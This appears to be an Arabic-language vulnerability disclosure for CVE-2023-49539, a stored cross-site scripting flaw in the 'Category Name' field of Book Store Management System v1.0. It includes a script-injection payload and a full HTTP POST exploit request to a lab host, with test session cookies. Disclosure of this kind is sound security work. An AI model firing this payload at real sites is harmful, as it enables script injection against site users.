
نظام إدارة متجر الكتب الإصدار 1.0 - ثغرة برمجة نصية عبر المواقع (XSS) في "index.php/category" - الحقل المعرض للخطر: "Category Name"
الوصف: تم اكتشاف أن نظام إدارة المكتبات Book Store Management System v1.0 يحتوي على ثغرة من نوع البرمجة النصية عبر المواقع (XSS) في "/bsms_ci/index.php/category". تسمح هذه الثغرة للمهاجمين بتنفيذ نصوص برمجية تعسفية من الويب أو HTML عبر إدخال حمولة معدّة في حقل "اسم الفئة".
إصدار المنتج المعرض للخطر: Book Store Management System v1.0
مؤلف CVE: Geraldo Alcântara
التاريخ: 29/11/2023
تم التأكيد في: 15/12/2023
CVE: CVE-2023-49539
تم الاختبار على: Windows
توجد الثغرة داخل صفحة "/bsms_ci/index.php/category/". على وجه التحديد، عند إنشاء/تعديل فئة، تم تحديد حقل "اسم الفئة" على أنه معرض للخطر. يمكن للمهاجمين استغلال هذه الثغرة عن طريق إدخال حمولة برمجة نصية عبر المواقع (XSS) في حقل "اسم الفئة" أثناء عملية إنشاء/تعديل الفئة.
<\td><script>alert(document.domain)</script>
POST /bsms_ci/index.php/category/category_update HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/bsms_ci/index.php/category
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; ci_session=72ruij3r4688s92v273ncnqjm150uvu8
Upgrade-Insecure-Requests: 1
category_code_lama=12&category_code=12&category_name=%3c%5ctd%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e&edit=Save
المكتشف/الائتمان:
Geraldo Alcântara